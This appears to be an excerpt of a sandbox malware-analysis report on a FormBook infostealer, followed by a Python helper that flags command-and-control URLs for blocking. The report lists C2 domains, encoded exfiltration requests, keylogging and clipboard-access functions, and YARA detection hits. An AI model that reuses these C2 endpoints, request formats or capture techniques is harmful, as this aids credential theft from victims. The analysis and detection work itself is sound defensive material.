            Source: global trafficHTTP traffic detected: GET /2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.erosonline.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.cavetta.org.mtUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global traffic DNS traffic detected: DNS query: www.jl884.vip
            Source: global traffic DNS traffic detected: DNS query: www.cloudsoda.xyz
            Source: global traffic DNS traffic detected: DNS query: www.d99qtpkvavjj.xyz
            Source: global traffic DNS traffic detected: DNS query: www.firmshow.top
            Source: global traffic DNS traffic detected: DNS query: www.jl800.vip
            Source: global traffic DNS traffic detected: DNS query: www.theridleysuk.co.uk
            Source: global traffic DNS traffic detected: DNS query: www.dexiangovernment.org
            Source: global traffic DNS traffic detected: DNS query: www.autonomyai.xyz
            Source: global traffic DNS traffic detected: DNS query: www.faxinguxn6.cn
            Source: global traffic DNS traffic detected: DNS query: www.hereboy.co.uk
            Source: global traffic DNS traffic detected: DNS query: www.rebornqababy.ru
            Source: global traffic DNS traffic detected: DNS query: www.bulletinnest.com
            Source: global traffic DNS traffic detected: DNS query: www.erosonline.com.br
            Source: global traffic DNS traffic detected: DNS query: www.cavetta.org.mt
            Source: unknown HTTP traffic detected: POST /r4rr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 212 Host: www.d99qtpkvavjj.xyz Origin: http://www.d99qtpkvavjj.xyz Referer: http://www.d99qtpkvavjj.xyz/r4rr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Ascii: GBbljTO=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzj/sBhXr6kkr64B0HGgLoGvRL+rTz7hZW9hzdxozQKeF
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:03:32 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:03:35 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:03:37 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:03:40 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: awselb/2.0 Date: Tue, 02 Jul 2024 12:04:34 GMT Content-Length: 0 Connection: close WAFRule: 5
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Tue, 02 Jul 2024 12:04:37 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Tue, 02 Jul 2024 12:04:41 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Tue, 02 Jul 2024 12:04:43 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Tue, 02 Jul 2024 12:04:46 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Tue, 02 Jul 2024 12:05:07 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Tue, 02 Jul 2024 12:05:10 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Tue, 02 Jul 2024 12:05:12 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Tue, 02 Jul 2024 12:05:15 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 279 Connection: close Vary: Accept-Encoding Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rebornqababy.ru Port 80</address></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:05:21 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:05:23 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:05:26 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:05:35 GMT Server: Apache Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT ETag: "1e8-595ad1aad5040" Accept-Ranges: bytes Content-Length: 488 Connection: close Content-Type: text/html Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:05:38 GMT Server: Apache Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT ETag: "1e8-595ad1aad5040" Accept-Ranges: bytes Content-Length: 488 Connection: close Content-Type: text/html Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 02 Jul 2024 12:05:40 GMT Server: Apache Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT ETag: "1e8-595ad1aad5040" Accept-Ranges: bytes Content-Length: 488 Connection: close Content-Type: text/html Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:43 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Connection: closeContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>
            Source: convert.exe, 00000008.00000002.4580175851.000000000490A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.00000000042FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2
            Source: convert.exe, 00000008.00000002.4580175851.0000000004C2E000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000461E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cavetta.org.mt
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4580723330.0000000005253000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cavetta.org.mt/yhnb/
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: convert.exe, 00000008.00000002.4580175851.0000000003C7A000.00000004.10000000.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.000000000366A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: convert.exe, 00000008.00000003.2745440600.00000000077EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: convert.exe, 00000008.00000002.4573809328.0000000002922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: convert.exe, 00000008.00000002.4573809328.0000000002949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: convert.exe, 00000008.00000002.4582079509.000000000780B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
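            The strings above are of three kinds. The `/r7gq/?GBbljTO=...` and `/yhnb/?GBbljTO=...` entries have the shape FormBook uses for its check-in and exfiltration requests (one short path segment, a single query key, a base64-alphabet blob); `www.cavetta.org.mt/yhnb/` is that path with no data attached; and the ecosia, duckduckgo, yahoo and login.live.com entries are ordinary browser search-suggest and Microsoft account URLs that sit in the same dumps because the stealer had read browser data into its memory. The Python below is an added triage helper, not part of the Joe Sandbox report. The path, key and value patterns are heuristics chosen for this sample rather than a published FormBook specification, and the input list is the set of strings listed above, with the report's own truncations preserved.

```python
import re
from urllib.parse import urlsplit

# Constructed input: the URL strings listed above, copied from the report
# with the report's own truncation preserved.
REPORT_STRINGS = [
    "http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2",
    "http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0",
    "http://www.cavetta.org.mt",
    "http://www.cavetta.org.mt/yhnb/",
    "https://ac.ecosia.org/autocomplete?q=",
    "https://duckduckgo.com/ac/?q=",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
    "https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:",
    "https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css",
]

# Heuristic shape of a FormBook check-in URL, chosen for this sample (an
# assumption, not a published specification): one short lowercase alphanumeric
# path segment, exactly one query key of 6-8 letters/digits, and a value drawn
# from the standard base64 alphabet ('/' survives, so it is not URL-safe
# base64) that is long enough to carry encrypted data.
C2_PATH = re.compile(r"^/[a-z0-9]{2,6}/$")
C2_KEY = re.compile(r"^[A-Za-z0-9]{6,8}$")
C2_VALUE = re.compile(r"^[A-Za-z0-9+/=]{16,}$")


def classify(url):
    """Return 'c2-candidate', 'c2-path-only', 'other' or 'not-a-url'."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "not-a-url"
    if not C2_PATH.match(parts.path):
        return "other"
    if not parts.query:
        return "c2-path-only"
    # Split by hand: parse_qsl would turn '+' into a space and break the
    # base64 alphabet check.
    key, sep, value = parts.query.partition("=")
    if sep and "&" not in value and C2_KEY.match(key) and C2_VALUE.match(value):
        return "c2-candidate"
    return "other"


def triage(strings):
    """Classify every string and group C2 candidates by their query key.

    Hosts that share one key are likely entries of the same embedded
    configuration, which is the grouping wanted for blocking.
    """
    verdicts = {}
    hosts_by_key = {}
    for s in strings:
        verdict = classify(s)
        verdicts[s] = verdict
        if verdict == "c2-candidate":
            parts = urlsplit(s)
            key = parts.query.partition("=")[0]
            host = parts.hostname.removeprefix("www.")
            hosts_by_key.setdefault(key, set()).add(host)
    return verdicts, hosts_by_key


if __name__ == "__main__":
    verdicts, groups = triage(REPORT_STRINGS)
    for url, verdict in verdicts.items():
        print(f"{verdict:14} {url}")
    for key, hosts in groups.items():
        print(f"key {key!r} shared by: {', '.join(sorted(hosts))}")
```

            The path test alone is not enough: `https://duckduckgo.com/ac/?q=` also has a two-character path, and only the key and value checks push it into the "other" bucket. The result worth acting on is the shared key `GBbljTO` on two unrelated hosts, bulletinnest.com and cavetta.org.mt. That points at one embedded configuration rather than two infections, so both hosts belong on the same indicator list, and the next check is whether the remaining configuration entries can be recovered from the unpacked FormBook memory.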
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0088425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0088425A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00884458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00884458
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00870219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00870219
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0089CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0089CDAC

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: This is a third-party compiled AutoIt script.1_2_00813B4C
            Source: hkLFB22XxS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: hkLFB22XxS.exe, 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_92048b26-d
            Source: hkLFB22XxS.exe, 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cc3b59bc-a
            Source: hkLFB22XxS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f3d8992e-4
            Source: hkLFB22XxS.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_777ff0bd-c
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B253 NtClose,2_2_0042B253
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
